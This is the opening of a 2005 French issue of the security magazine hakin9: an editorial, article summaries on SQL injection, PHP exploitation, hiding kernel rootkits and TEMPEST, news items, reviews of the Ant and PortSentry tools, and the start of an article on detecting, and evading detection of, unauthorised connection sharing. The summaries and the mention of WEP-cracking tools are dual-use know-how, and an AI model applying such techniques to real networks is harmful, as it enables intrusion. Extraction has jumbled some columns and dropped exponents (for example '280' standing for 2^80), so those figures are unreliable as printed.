Bases
12
Rédacteur en chef : Roman Polesek
hakin9, chapelier fou
Quand l'un de nos auteur, Sacha Fuentes (Recherche
et exploitation des bogues dans le code PHP), nous avertit
qu'il ne faut pas faire confiance aux utilisateurs, il a raison.
Le facteur humain était toujours le point faible de la sécurité
informatique. Tout le monde sait qu'un élément le plus dou-
teux de chaque système informatique est cette combinaison
des protéines unissant la chaise avec le clavier. Aussi Tobias
Glemser (Attaques par injection SQL avec PHP et MySQL)
essaie de nous présenter les menaces relatives aux don-
nées entrées dans le système sans aucune vérification.
Le problème est que cet élément faible donne le sens
à l'existence des machines à calculer. Si les humains n'avaient
pas existé, il ne serait pas nécessaire d'effectuer les calculs
ou d'échanger les informations entre les coins du monde les
plus lointains. Indépendamment d'une justification morale
de ces procédés, sans nous, les tentatives de débloquer le
code n'auraient pas lieu (Jakub Nowak, Protéger les logiciels
Windows contre les pirates informatiques). Les connexions
illégales aux réseaux ne seraient pas pratiquées non plus
(Détecter le partage de connexion illégal). Il ne faudrait pas
lutter contre les programmes malicieux tels que les vers sur
Internet (Michał Piotrowski, Honeypots – leurre contre les
vers) ou suivre les intrus se dissimulant dans les systèmes
(Mariusz Burdach, Méthodes de dissimulation des modules du
noyau dans Linux). Mais tous ces vices humains n'existent que
depuis la prise de conscience par l'homme de la propriété.
Les dispositifs permettant d'intercepter l'émission révéla-
trice (Robin Lobel, TEMPEST – émissions compromettantes)
ne diffèrent en rien d'une voisine indiscrète qui nous écoute
à travers le mur, un verre à l'oreille. De même, quelqu'un qui
s'introduit la nuit dans le local informatique (Jeremy Martin,
Conception de systèmes de sécurité physique) ressemble
à un troglodyte se glissant dans la grotte d'autrui.
Le but de la parution de hakin9 est de savoir comment
fonctionnent diverses attaques afin de mieux pouvoir s'en
prémunir. Nous tentons d'aborder tous les sujets difficiles,
voire gênants. Des fois, nous mettons un chapeau blanc, des
fois – un chapeau noir. Au-delà du côté éthique, toutes ces
actions – heureusement ou pas – proviennent de la nature
humaine. Tant que les hommes continueront à intriguer, le
jeu « des gendarmes et des voleurs » ne sera pas terminé.
Roman Polesek
romanp@hakin9.org
2 www.hakin9.org
Détecter le partage de connexion illégal
Mariusz Tomaszewski, Maciej Szmit, Marek Gusta
Les personnes qui se connectent illégalement au réseau peu-
vent donner du mauvais sang aux administrateurs et aux four-
nisseurs d'accès Internet. Mais il existe plusieurs méthodes
pour détecter ces pratiques ignobles. Ces méthodes ne sont
pas ni trop compliquées ni fastidieuses. Nous vous montrons
comment les mettre en pratique ou les contourner.
22
Recherche et exploitation des bogues
dans le code PHP
Sacha Fuentes
Les programmes et scripts développés avec PHP, un des
langages de programmation les plus utilisés, sont souvent
vulnérables à différentes attaques. Il ne s'agit certes pas
d'une certaine insécurité au niveau du langage lui-même,
mais plutôt de l'inexpérience des programmeurs qui com-
mettent souvent des erreurs de conception. Consultez les
vulnérabilités possibles dans le code PHP et apprenez com-
ment les trouver et les exploiter.
Attaque
30
Attaques par injection SQL
avec PHP et MySQL
Tobias Glemser
Il existe un certain nombre de techniques communes dont
l'objectif est d'attaquer les environnements PHP/MySQL.
Les injections SQL font partie des techniques d'attaques
parmi les plus utilisées. Cette technique consiste à altérer
l'état de l'application qui subit l'attaque de manière à accep-
ter nos données d'entrée capables de manipuler les requê-
tes SQL. Voyons comment le faire.
36
Méthodes de dissimulation des modules
du noyau dans Linux
Mariusz Burdach
L'insertion d'un rootkit en module dans le noyau est le début
de la tâche de l'intrus. Pour rester inaperçu, il faut trouver
le moyen de cacher ce code de façon à ne pas éveiller des
soupçons. Vous connaîtrez les méthodes permettant de
cacher un module quelconque dans le système.
40
TEMPEST – émissions compromettantes
Robin Lobel
TEMPEST est l'art de transformer des émissions involontaires
en données compromettantes. Cela concerne principalement
les ondes électromagnétiques, mais le principe peut être aussi
bien appliqué à n'importe quel type d'émanations involontai-
res induites par le fonctionnement interne d'un périphérique.
L'article présente comment construire une machine qui sait
capturer des émissions venant des moniteurs CRT.
hakin9 N o 3/2005
Défense
48
Honeypots – leurre contre les vers
Michał Piotrowski
Les vers de réseau se propagent très rapidement – afin de
pouvoir se défendre efficacement, il faut avoir leur code
et l'analyser. Les systèmes honeypots permettent non seule-
ment de capturer un ver, mais aussi d'observer ses actions et
de le supprimer automatiquement des machines infectées.
60
Protéger les logiciels Windows contre les
pirates informatiques
Jakub Nowak
La travail du développeur qui crée des applications shareware
devient tôt ou tard la proie des pirates informatiques. Il arrive
souvent qu'un crack ou un keygen apparaisse sur le net le
jour de la sortie du logiciel. Il existe cependant les méthodes
efficaces permettant de protéger le code contre les voleurs.
Vous apprenez à les mettre en pratique.
68
Conception de systèmes
de sécurité physique
Jeremy Martin
Dépenser de l'argent dans la protection de données pouvant
être recréées ne présente aucun intérêt ; que pourrait-il se
passer concrètement ? – des commentaires de ce genre
émanent d'un trop grand nombre de cadres issus des hautes
sphères dirigeantes. Du mauvais emploi de la part de l'em-
ployé à l'espionnage industriel, en passant par les catas-
trophes naturelles, il existe une grande variété de menaces
dirigées contre les actifs d'une société. Mais il faut bien
reconnaître que la sécurité physique constitue la première
ligne de défense d'un système d'information.
Le périodique est publié par Software-Wydawnictwo Sp. z o.o.
Software-Wydawnictwo Sp. z o.o.,
Lewartowskiego 6, 00-190 Varsovie, Pologne
Tél. +48 22 860 18 81, Fax. +48 22 860 17 70
www.hakin9.org
Directeur de la publication : Jarosław Szumski
Imprimerie, photogravure : 101 Studio, Firma Tęgi
Ekonomiczna 30/36, 93-426 Łódź
Imprimé en Pologne/Printed in Poland
Abonnement (France métropolitaine) : 1 an (soit 6 numéros) 38 €
DOM/TOM, étranger : nous consulter
Dépôt légal : à parution
ISSN : 1731-7037
Commission paritaire : en cours
Distribution : MLP
Parc d’activités de Chesnes, 55 bd de la Noirée
BP 59 F - 38291 SAINT-QUENTIN-FALLAVIER CEDEX
(c) 2005 Software-Wydawnictwo, tous les droits réservés
Rédacteur en chef : Roman Polesek romanp@hakin9.org
Rédactrice adjointe : Paulina Nowak paulinan@software.com.pl
Secrétaire de rédaction : Tomasz Nidecki tonid@hakin9.org
Maquette : Anna Osiecka annao@software.com.pl
hakin9 N o 3/2005
AVERTISSEMENT
Les techniques présentées dans les articles ne peuvent
être utilisées qu'au sein des réseaux internes.
La rédaction du magazine n'est pas responsable de l'utili-
sation incorrecte des techniques présentées.
L'utilisation des techniques présentées peut provoquer la
perte des données !
04 En abrégé
Les nouvelles du monde de la sécurité des systè-
mes informatiques.
Outils
08 Ant
Un outil performant destiné à envoyer différents
types de paquets réseaux.
10 PortSentry
Un utilitaire de surveillance des ports qui permet de
détecter les tentatives de scannage du système.
78 Feuilleton
Empreinte du passé
Il est grand temps de révolutionner l’envoi du cour-
rier électronique.
Couverture : Agnieszka Marchocka
Traduction : Grażyna Wełna, Iwona Czarnota, Marie-Laure Perrotey
Correction : Jérémie Fromaget, Jean-François K@sparov, Gabriel
Campana, Gilles Gaffet, Sebastien Lecocq, Pierre-Emmanuel Leriche,
Gilles Fournil
Le meilleur bétatesteur : Gilles Fournil
Bétatesteur : Gaëtan Duquesne
Les personnes intéressées par la coopération sont priées de nous
contacter : cooperation@software.com.pl
Abonnement : abonnement@software.com.pl
Fabrication : Marta Kurpiewska marta@software.com.pl
Diffusion : Monika Godlewska monikag@software.com.pl
Publicité : adv@software.com.pl
La rédaction fait tout son possible pour s’assurer que les logiciels sont à jour, pourtant
elle décline toute responsabilité pour leur utilisation. Elle ne fournit pas de support
technique lié à l’installation ou l’utilisation des logiciels enregistrés sur le CD-ROM. Tous
les logos et marques déposés sont la propriété de leurs propriétaires respectifs.
La rédaction utilise le système PAO
Pour créer les diagrammes on a utilisé le programme
Le CD-ROM joint au magazine a été testé avec AntiVirenKit de la société G Data
Software Sp. z o.o.
www.hakin9.org 3

En abrégé
En prison pour Lynx
Un habitant de Londres âgé de 28
ans a été arrêté par la police – la
cause en était une tentative proba-
ble d'intrusion à l'un des serveurs
de British Telecom. Il a été libéré,
mais il doit se présenter chaque
jour au commissariat de police.
Cet homme, touché profondément
par la tragédie en Asie, a voulu offrir
quelques sous au compte d'une
fondation aidant les victimes du
tsunami. Il a utilisé Internet (le site
était hébergé sur les serveurs BT)
– malheureusement, il s'est servi du
navigateur texte Lynx installé sur le
système Solaris 10.
Ce programme, peu fréquem-
ment utilisé, a éveillé les soup-
çons de la personne qui vérifiait
les journaux d'événements. Elle
a constaté que ce comportement
(User-Agent non standard) était
suspect et a prouvé une tenta-
tive d'attaque, et elle a informé la
police. Les policiers ont forcé la
porte du bienfaiteur et l'ont arrêté.
La première poursuite en justice a
eu lieu début d'avril 2005.
Voyages du ver Cabir
En Californie, à Santa Monica, une
version de Cabir, virus infectant
les systèmes Symbian à l'aide de
l'interface bluetooth, a été décou-
verte dans deux téléphones Nokia
6600.
Il s'agit de la première apparition
de Cabir sur le territoire américain.
Cabir a déjà fait son apparition
dans d'autres pays, de même que
sa mutation plus complexe Lasco
(qui est capable d'infecter aussi
les fichiers et pas seulement de se
multiplier). Mais c'est le premier qui
se déplace aussi facilement dans le
monde entier.
La situation devient de plus en
plus grave. Les opérateurs des
cellulaires commencent à considé-
rer les virus comme une menace
réelle. Trend Micro et McAfee, deux
éditeurs connus des anti-virus, ont
publié les versions de leurs produits
pour mobiles.
4 www.hakin9.org
SHA-1 au rancart ?
Après le déchiffrement réussi de l'al-
gorithme MD5, on s'est mis à déchif-
frer la fonction de hachage SHA-1,
considérée jusqu'alors comme très
sûre. Les spécialistes sont d'avis
qu'il est temps de passer à ses
variantes plus sûres, comme SHA-
256 et SHA-512.
Xiaoyun Wang, Yiqun Lisa Yin
et Hongbo Yu de l'Université Shan-
gdong ont annoncé qu'il ont réussi
à réduire considérablement le temps
nécessaire pour trouver les collisions
dans SHA-1. Vu qu'à l'aide de l'attaque
brute force, il était nécessaire d'effec-
tuer 280 d'opérations de hachage, une
nouvelle méthode – présentée dans
un document disponible uniquement
à des autorités scientifiques élues
– permet de réduire ce nombre à
269 d'opérations. Bref, la nouvelle
méthode est 2000 fois plus rapide.
Les Chinois ont publié les résultats
partiaux de leurs recherches. Pour
retrouver une collision par le biais de
leur méthode, il faut respectivement :
233 d'opérations pour SHA-1 de 58
tours, 239 d'opérations pour SHA-0, 269
pour SHA-1 non simplifié.
Cela peut paraître beaucoup.
Cependant, étant donné la puissance
des ordinateurs d'aujourd'hui et la
loi de Moore, il serait naïf de croire
encore à cet algorithme. Il ne faut pas
oublier des solutions qui, au moins
théoriquement, sont capables d'accé-
lérer ce processus de calcul.
La première solution est le dis-
positif appelé DES Cracker, conçu
en 1999 par des cryptographes. Sa
eBay aide au phishing
Parmi les phishers, le site http://
www.ebay.com, le système le plus
populaire d’enchères via Internet, est
utilisé de plus en plus souvent pour
légitimer leurs actions.
Suivant le service The Register
(http://theregister.co.uk), les pirates
exploitent le script de redirection dispo-
nible sur le site d’eBay. Cette adresse
s’affiche dans plusieurs emails mali-
cieux dernièrement envoyés. Ainsi, les
pages falsifiées paraissent plus véri-
diques – le lien se réfère à l’adresse
première version, coûtant 250 000 de
dollars (les copies coûtent environ 1/4
de ce montant), permettait d'effectuer
256 d'opérations DES pendant 56
heures. Étant donné la loi de Moore,
on peut admettre qu'une machine
similaire construite aujourd'hui pour-
rait effectuer 260 d'opération dans ce
temps (269 d'opérations prendraient
3,5 ans !). Mais si l'on investissait
environ 38 000 000 de dollars, cette
période (3,5 ans) pourrait être réduit
à 56 heures – dans le futur, cela dure-
rait encore plus court.
La seconde solution est pure-
ment logicielle. En 2002, après
5 années de calculs, l'entreprise
mathématique utilisant le réseau
http://distributed.net destiné à des
calculs statistiques compliqués,
a touché à sa fin. Plus de 300 000
utilisateurs ont partagé la puis-
sance de leurs ordinateurs et enfin
un utilisateur du Japon a trouvé la
combinaison appropriée. Référons-
nous encore une fois à la loi de
Moore – aujourd'hui, pour obtenir le
même résultat, il suffirait de 1/4 de
ce temps.
SHA-1 est aujourd'hui la fonction
de hachage la plus utilisée. Elle a été
créée en 1995 à partir de la fonction
SHA-0 (1993) considérée comme
dangereuse. Vu les succès des
chercheurs chinois, nous pouvons
constater que ses jours sont comp-
tés. Heureusement, il existe encore
des solutions alternatives plus sûres,
comme les mutations de l'algorithme
SHA (256, 384, 512).
du site d’enchères et le script redirige
ensuite la connexion vers les pages
des phishers. Les détails techniques
sont bien sûr inconnus.
Les attaques de type phishing
font de plus en plus de victimes.
Le rapport d’Anti-Phishing Working
Group, organisme qui surveille ces
cas, indique que le nombre d’emails
de type phishing a atteint en janvier
un chiffre de près de 13000, ce qui
donne une augmentation de 40% par
rapport à décembre 2004.
hakin9 N o 3/2005

Système, ouvre-toi
Solaris – le système de la famille
UNIX produit par SUN Microsystems
– sera disponible avec son code
source sous la licence conforme
au standard open source. C'est
une bonne nouvelle, bien que les
malicieux considèrent que cette
démarche de l'entreprise est une
tentative de décharger leur propres
programmeurs.
Selon les affirmations de SUN, le
code source de Solaris 10 (le système
a eu sa première le 1 février 2005)
sera disponible dans sa totalité dans
la deuxième moitié de l'année, sur
le site http://opensolaris.org. Pour
l'instant, comme preuves d'une bonne
volonté de l'entreprise, il est possible
de télécharger les sources de DTrace
– un excellent outil permettant le tra-
çage dynamique du code.
Autant DTrace que Solaris seront
entièrement disponibles sous la
licence CDDL (Common Develop-
ment and Distribution License),
approuvée par OSI (Open Source Ini-
tiative), une organisation très impor-
tante pour les logiciels libres. Pourtant
Nous savons où tu es
Cela peut être la fin de l’anony-
mat dans Internet – un doctorant
à l’UCLA a annoncé qu’il a décou-
vert la méthode de prise d’em-
preinte digitale à distance des
dispositifs physiques. Les détails
seront présentés lors du Sym-
posium sur la Sécurité et la Vie
Privée, organisée en mai par l’IEEE
(Institute of Electrical and Electro-
nics Engineers).
Tadayoshi Kohno avec son équipe
semble avoir trouvé un moyen d’iden-
tifier à distance des dispositifs (p. ex.
des cartes réseau) sans la coopé-
ration de l’appareil et à l’insu de son
utilisateur. Il paraît que la méthode
fonctionne indépendamment de
l’infrastructure réseau – elle permet,
entre autres, d’identifier un ordinateur
donné, bien que même si celui-ci se
trouve derrière un pare-feu ou change
d’adresse IP derrière un NAT.
L’idée du groupe du doctorant
exploite les variations des horlo-
hakin9 N o 3/2005
SUN informe que ce processus sera
effectué progressivement – au moins,
tout d'abord, les pilotes seront fournis
sous forme binaire.
Solaris 10, présenté comme le
plus avancé technologiquement des
systèmes UNIX, est déjà proposé
en téléchargement. Vous pouvez le
télécharger tout à fait gratuitement,
après avoir rempli le formulaire
d'enregistrement. Deux types sont
disponibles : pour les systèmes
UltraSPARC et Intel/Opteron. Il
occupe 4 CDs (ou un DVD) et un
Companion Disc optionnel contenant
les binaires GNU précompilés.
Certains peuvent être mécon-
tents – CDDL n'est pas GNU GPL,
les sources seront incomplètes...
Les paranoïaques ajouteront que ce
ne sont que de belles promesses et
personne ne verra jamais du code.
Mais nous espérons que SUN tien-
dra sa promesse. Le produit principal
de l'entreprise joindra ces cousins
– Linux et les systèmes de la famille
BSD. Un choix plus ample ne fera
pas de mal.
ges internes pour traiter le signal,
appelées clock skew (décalage
d’horloge). Vu que dans la plupart
des piles TCP le support de TCP
timestamps (RFC 1323) est implé-
menté (RFC 1323), il était possible
d’élaborer le système d’analyse
des informations collectées. La
partie principale de l’étude se base
sur un test de 38 jours, utilisant 69
machines configurées de façon
identique tournant sous Windows
XP. Le résultat a fait apparaître que
les variations de l’horloge sont diffé-
rentes pour chaque machine et per-
mettent de l’identifier parmi d’autres
machines.
La méthode de prise d’empreinte
digitale a distance a été aussi
testée avec succès sur les systè-
mes Windows 2000, MacOS X,
Red Hat, Debian, FreeBSD et Open-
BSD.
www.hakin9.org
Rootkits arrivent
Les experts de Microsoft ont peur
d'une nouvelle génération de virus
et troyens exploitant les rootkits du
noyau du système.
Les rootkits (cf. les articles de
Mariusz Burdach dans ce numéro
et dans le numéro précédent de
hakin9) sont un ensemble de
programmes permettant d'obtenir
les droits d'accès les plus élevés
du système et de s'y dissimuler.
Bien que l'idée provienne des
systèmes basés sur UNIX, depuis
la naissance de Windows NT, elle
est aussi présente dans les systè-
mes de Redmond. Microsoft a des
raisons de s'inquiéter – les root-
kits du noyau deviennent de plus
en plus utilisés parmi les auteurs
des malwares. On peut admettre
que cela risque d'empirer et que
ces solutions seront assez fré-
quentes.
C'est pourquoi, l'entreprise de
Redmond a conçu un outil spé-
cial baptisé Strider Ghostbuster
qui vérifie les fichiers système de
Windows du point de vue de leurs
modifications. S'ils diffèrent des
versions initiales d'installation,
le programme émet une alerte.
Pour l'instant, l'unique solution
au problème est la réinstallation
du système (évidemment, après
l'archivage des données impor-
tantes).
Premier spimmer arrêté
Un adolescent New-yorkais de 18
ans vient d’être arrêté pour avoir
envoyé en masse des messages
spim (envoi du spam au travers
du services de messagerie ins-
tantanée).
Greco, a envoyé plus de 1 500 000
de messages de type spam (la
publicité des montres Rolex, la
pornographie, etc.) aux utilisa-
teurs de la messagerie instan-
tanée de MySpace.com, un portail
de rencontres pour adolescents.
D'après les représentants de
l'entreprise, Anthony Greco exer-
çait son activité depuis décembre
2004.
De plus, l’adolescent a menacé
MySpace.com de continuer ses
envois massifs de spam jusqu'à
ce que la compagnie ne l’em-
bauche. L'entreprise a utilisé
une ruse et a invité Greco à une
rencontre. Celui-ci, convaincu que
son plan avait réussi, a été arrêté
par la police sur l'aéroport de Los
Angeles.
5

hakin9.live
Sur le CD
S
ur le CD joint au magazine, on vous offre
hakin9.live (h9l), en version 2.5 – une distribu-
tion bootable de Linux qui réunit les outils, une
documentation, des tutoriaux et les suppléments des
articles.
Pour commencer avec hakin9.live, il suffit de démar-
rer l'ordinateur avec le CD. Les options supplémentaires
liées au démarrage du CD (choix de langue, résolution,
désactivation de framebuffer etc.) sont présentées dans
la documentation contenue sur le CD – le fichier help.html
(si vous consultez le contenu depuis le h9l démarré, ce
fichier se trouve dans home/haking/help.html).
Quoi de neuf ?
La version 2.5 s'appuie sur Aurox Live 10.1. Le système
fonctionne sous contrôle du noyau 2.6.7, la détection du
matériel a été améliorée et la configuration du réseau
rendue plus fonctionnelle. Nous avons également unifor-
misé le menu – les programmes sont classés en catégo-
ries adéquates ce qui permet un accès plus intuitif aux
applications.
Le nouveau hakin9.live comporte beaucoup plus de
suppléments – des documents RFC mis à jour, quelques
livres gratuits en format PDF et HTML, ainsi que des arti-
cles non publiés, en outre Windows Security Penetrated
de Adrian Pastor (en anglais).
La version actuelle de h9l voit apparaître de nou-
veaux programmes :
Figure 1. hakin9.live est un outil condensé et pratique
6 www.hakin9.org
• honeyd – un honeypot à basse interaction,
• Apache, PHP et MySQL,
• AutoScan – un outil graphique pour scanner minutieu-
sement des segments entiers de réseau,
• ROX – un gestionnaire de bureau et de fichiers,
• AirCrack – un programme de plus pour casser les
clés WEP.
• Ant – un excellent outil (GTK) pour construire
et envoyer des trames et paquets réseaux de notre
choix.
À présent, le gestionnaire de fenêtres est par défaut
fluxbox, légèrement modifié. Il a un aspect agréable, est
parfaitement configuré et ses exigences en matériel sont
minimes. Enfin, on vous donne la possibilité de démarrer
avec un environnement graphique agréable xfce4 en ver-
sion 4.2 (option de démarrage hakin9 xfce4).
Documentation et tutoriaux
Excepté les conseils de démarrage et le support
hakin9.live, la documentation comporte aussi des tutoriaux
avec des exercices pratiques élaborés par nous-mêmes.
Utiliser les tutoriaux implique un travail avec hakin9.live. Ce
principe nous évitera bien de problèmes liés aux différentes
versions des compilateurs, aux fichiers de configurations
placés ailleurs, ou il nous épargnera encore les soucis
des options indispensables pour pouvoir démarrer le pro-
gramme dans un environnement donné.
La présente version de hakin9.live comporte deux
tutoriaux de plus, rajoutés à ceux déjà existants. Le pre-
mier dont l'auteur est Tobias Glemser – montre comment
mener les attaques Injection SQL sur la base MySQL.
Nous allons apprendre à passer habilement les requêtes
aux systèmes de forums (en anglais bulletin boards) sur
l'exemple de YaBB SE.
Le deuxième nouveau tutorial traite de l'utilisation des
honeypots (sur l'exemple de Honeyd) pour détecter les virus
et désinfecter les ordinateurs de notre réseau. C'est une
application pratique du savoir présenté dans l'article Honey-
pots – leurre contre les vers de Michał Piotrowski. n
Figure 2. De nombreux suppléments
hakin9 N o 3/2005
 Ant
Système : Linux, *NIX
Licence : GNU GPL
But : Création et envoi des trames réseau
Outils
Page d'accueil : http://ant.sourceforge.net/

Ant est un outil graphique (utilisant la bibliothèque GTK) qui facilite l'analyse
et les tests de sécurité des réseaux et des systèmes informatiques – il permet
de créer et d'envoyer des trames réseau avec les en-têtes des protocoles les
plus courants (IPv4/IPv6, TCP, UDP, ARP, IPX, SPX et autres). Il a gagné au
concours de hakin9 du meilleur front-end pour SendIP – il est disponible sur
hakin9.live.

Démarrage rapide : vous êtes administrateur d'un
petit réseau et vous voulez tester la réaction de votre
routeur aux différentes trames envoyées à partir du
réseau local. Mais la préparation manuelle (même
à l'aide du programme SendIP) de plusieurs types de
trames ethernet peut être très fastidieuse et il est facile
de commettre une erreur. Il est donc préférable de se
servir d'un outil très convivial et quasi automatique, par
exemple Ant.
Vu que le programme est en phase de développement
(pourtant, il est tout à fait opérationnel), avant de l'utiliser,
il faut compiler son code source – n'oubliez pas qu'Ant,
pour fonctionner correctement, exige les bibliothèques
gtk+, libnet et libpcap. Après le chargement des sources,
décompactez-les et passez au répertoire ant :
$ tar jxvf ant-0.1.tar.bz2
$ cd ant
Ensuite, tapez la commande :
$ make
nante ; elle permet de paramétrer la version du protocole
(IPv4 ou IPv6), la longueur de la trame, les drapeaux
(don't fragment et more fragments), la valeur TTL,
le protocole de la couche supérieure (TCP) et l'adresse IP
source et cible. Vous pouvez aussi déterminer la somme
de contrôle IP (le bouton bleu au-dessous), pourtant
il est recommandé de laisser les valeurs proposées par
le programme.
La dernière étape consiste à ajouter l'en-tête TCP
et sa somme de contrôle. Dans cet en-tête, vous pouvez
définir le port source et cible, la longueur et, par exemple,
les bits de contrôle (SYN, FIN, ACK, RST). L'ajout de
la somme de contrôle ne doit pas poser de problème.
Une fois la trame préparée, elle peut être envoyée à l'aide
de la commande Send.
Autres qualités : Ant permet la création de données
composées d'un nombre quelconque de trames. L'en-
voi peut être organisé en séries de transmissions :
vous devez entrer leur nombre, les intervalles entre les
séries et les trames spécifi ques en millisecondes. Les
trames créées peuvent être enregistrées pour un envoi
ultérieur.

Après quelques instants, le répertoire contiendra le Roman Polesek

fichier binaire ant. Si vous voulez, vous pouvez le copier
dans le répertoire disponible dans la variable $PATH (par
exemple /usr/bin). Le fichier doit être lancé avec les droits
de root, par exemple :

$ gksu ant

Admettons que vous vouliez créer une trame tout à fait

ordinaire avec les en-têtes IP et TCP. Après avoir démarré
Ant, vous pouvez passer à la création. Évidemment, vous
devez commencer par l'en-tête ethernet (bouton orange).
Une nouvelle fenêtre permettant la définition des options
de l'en-tête s'affiche – l'adresse MAC cible et source, le
type/taille et l'emplacement dans la trame. En ce qui con-
cerne le protocole IP, il est recommandé de laisser les
paramètres par défaut.
À l'étape suivante, il faut ajouter l'en-tête IP (bouton
bleu). La fenêtre d'options est encore plus impression- La création d'une trame dans le programme Ant

8 www.hakin9.org hakin9 N o 3/2005

 PortSentry
Système : *NIX
Licence : CPL, GPL
But : détecter le scannage des ports
Outils
Page d'accueil : http://sourceforge.net/projects/sentrytools

PortSentry est un utilitaire de surveillance des ports qui permet de détecter les
tentatives de scannage du système. Il intègre des mécanismes permettant de
verrouiller aussi bien le paquet lui-même que l'adresse d'un hôte depuis lequel
des paquets sont envoyés.

Démarrage rapide : Vous soupçonnez quelqu'un • portsentry -atcp – le logiciel écoute sur tous les ports
d'essayer de scanner votre système. Vous voulez au-dessous du numéro du port défini dans la ligne
vous protéger en verrouillant, les paquets suspects ADVANCED _ PORTS _ TCP du fichier portsentry.conf ; cette
qui arrivent et l'adresse IP de l'hôte qui les envoie. méthode est la plus sensible,
Tout d'abord, téléchargez le logiciel depuis la page • portsentry -audp – comme ci-dessus mais concerne
d'accueil de l'éditeur, décompressez-le dans un dos- UDP.
sier choisi et tapez la commande suivante dans le
répertoire PortSentry : Les informations sur toutes les tentatives de scannage
seront enregistrées dans /usr/local/psionic/portsentry/
$ make linux portsentry.history. Grâce au fichier portsentry.ignore
qui se trouve dans le même répertoire, il est possi-
Pour installer l'application, tapez la commande : ble d'ajouter les hôtes qui seront ignorés (non ver-
rouillés).
# make install D'autres possibilités fort utiles : il existe un utilitaire
supplémentaire nommé Logcheck permettant d'en-
Une fois cela fait, PortSentry sera installé par défaut dans voyer les journaux à l'administrateur par SMS ou par
/usr/local/psionic/portsentry. e-mail.
Une fois installé, le logiciel doit être configuré en édi-
tant le fichier portsentry.conf. Dans les lignes TCP _ PORTS Jan Korzeniowski
et UDP _ PORTS, il est possible de définir les ports à sur-
veiller. Rien n'empêche de les changer en 21,22,23,25,110,
par exemple – cela signifie que PortSentry filtrera les
paquets sur les ports des protocoles telnet, SSH, FTP,
SMTP et POP3.
Dans le même fichier, trouvez la ligne #iptables
support for Linux ; vous devez y taper un chemin correct
vers iptables. Finalement, supprimez # de la ligne KILL _
HOSTS _ DENY="ALL: $TARGET$ : DENY" pour que PortSentry
ajoute les hôtes au fichier hosts.deny.
PortSentry peut être démarré par plusieurs moyens. Figure 1. Journaux du logiciel PortSentry
Voici les commandes permettant de filtrer les différents
types de scannage :

• portsentry -tcp – le logiciel vérifie les fichiers de

configuration et il écoute sur les ports TCP défi-
nis,
• portsentry -udp – comme ci-dessus avec cette diffé-
rence que les ports UDP sont pris en compte,
• portsentry -stcp – PortSentry utilise les sockets pour
surveiller tous les paquets arrivants ; si un paquet est
destiné à un port surveillé, le logiciel verrouille les
connexions à l'hôte qui attaque,
• portsentry - audp – comme ci-dessus mais concerne Figure 2. Configuration de PortSentry à l’aide de
UDP, l’interface Webmin

10 www.hakin9.org hakin9 N o 3/2005

 Détecter le partage de
connexion illégal
Mariusz Tomaszewski, Maciej Szmit, Marek Gusta
L
orsqu'une connexion Internet est trop
chargée, l'administrateur peut partager
la bande passante entre les utilisateurs
légaux. Alors, vous n'avez pas à vous soucier
du fait que quelqu'un offre sa connexion à un
voisin (cf. l'Encadré Partage de connexion)
– cela n'a aucun impact sur la qualité de fonc-
tionnement du réseau. Ce qui reste, c'est le
problème de partage des frais.
Une question se pose : comment l'adminis-
trateur peut détecter que le réseau est exploité
par des tiers ? Il existe quelques techniques,
plus ou moins efficaces. Mais tout dépend du
savoir-faire de la personne qui se raccorde
illégalement au réseau et des techniques
qu'elle utilisera pour dissimuler ce fait.
La première façon, et en même temps la plus
raisonnable, de se protéger contre le partage de
connexion illégal est la division de la ligne. Cette
Bases
opération garantit que le débit de notre réseau
ne sera pas réduit à cause des utilisateurs non
autorisés, et que l'utilisation de la bande pas-
sante affectée ne dépendra pas du client.
Si la limitation de la bande passante ou
du transfert ne vous satisfait pas et si vous ne
souhaitez pas que la ligne soit partagée, vous
pouvez analyser le trafic dans votre réseau
12 www.hakin9.org
Les personnes qui se connectent
illégalement au réseau peuvent
donner du mauvais sang
aux administrateurs et aux
fournisseurs d'accès Internet.
Mais il existe plusieurs méthodes
pour détecter ces pratiques
ignobles. Ces méthodes ne
sont pas ni trop compliquées ni
fastidieuses.
et essayer de détecter ces situations. Si le contrat
avec votre FAI interdit la division de la ligne, celui
qui commet ce délit peut être tout simplement
débranché – évidemment, si vous avez réussi
à détecter le partage illégal. Mais ces actions res-
semblent plutôt à jouer « aux gendarmes et aux
voleurs » et ce dernier prend le dessus.
Valeurs TTL dans les en-têtes
des paquets IP
L'en-tête du datagramme IP possède le champ
TTL – durée de vie (en anglais Time To Live)
Cet article explique...
• comment dissimuler le partage illégal de con-
nexion,
• comment détecter le partage non autorisé de
notre connexion.
Ce qu'il faut savoir...
• utiliser le système Linux,
• connaître le modèle ISO/OSI,
• au moins les notions de base des protocoles
TCP/IP.
hakin9 N o 3/2005
 Partage de connexion illégal

à la connexion fonctionne en tant que

Partage de ligne routeur et transmet les paquets entre
Plusieurs personnes, en particulier celles qui ne connaissent pas bien Linux, choisiront ses interfaces (et dans le cas d'un
la méthode très simple basée sur le système Windows pour partager la connexion – la accès non autorisé au réseau publi-
fonction Partage de connexion Internet (Internet Connection Sharing – ICS). Grâce que, sur celui-ci le service NAT est
à cette méthode, les ordinateurs dans des réseaux à domicile ou dans des bureaux lancé), dans chaque paquet généré
sont capables de se connecter à Internet via une seule connexion réseau. par l'ordinateur A, B ou C, la valeur
ICS est une fonction intégrée du système Windows, mais elle ne peut être lancée du champ TTL sera diminuée d'une
que sur les ordinateurs tournant sous Windows XP, Windows 98 SE, Windows Millen-
unité. En conséquence, le réseau
nium Edition (Me) ou Windows 2000. À vrai dire, la fonction ICS est un ensemble d'élé-
LAN (10.10.11.0) contient les paquets
ments qui, contrairement au système Linux, ne sont pas disponibles pour l'utilisateur
dont le champ TTL aura la valeur
et la possibilité de les configurer est assez limitée. Les composants les plus importants
sont, à savoir : inférieure à une unité par rapport à la
valeur standard pour un système.
• le programme affectant les adresses DHCP – un service très simplifié qui affecte Pour détecter ces paquets, l'ad-
l'adresse IP, la passerelle par défaut et le serveur de noms dans le réseau local, ministrateur peut lancer sur la passe-
• le serveur proxy DNS dont la tâche consiste à transcrire les noms de domaine en relle Internet un analyseur de paquets
adresses IP pour les clients du réseau local, (sniffeur) et vérifier si dans le réseau,
• le translateur d'adresses réseau qui transcrit les adresses privées en adresse
il n'existe pas des paquets ayant les
publique (adresses publiques).
valeurs du champ TTL bizarres pro-
Le système Linux exploite le mécanisme de translation d'adresse réseau NAT (en an- venant d'une seule adresse IP (dans
glais Network Address Translation) ou utilise les serveurs proxy. Le NAT et le proxy sont notre cas 10.10.11.95). En admettant
des technologies implémentées dans les systèmes de pare-feu, et leur but principal est que sur l'ordinateur A le système Win-
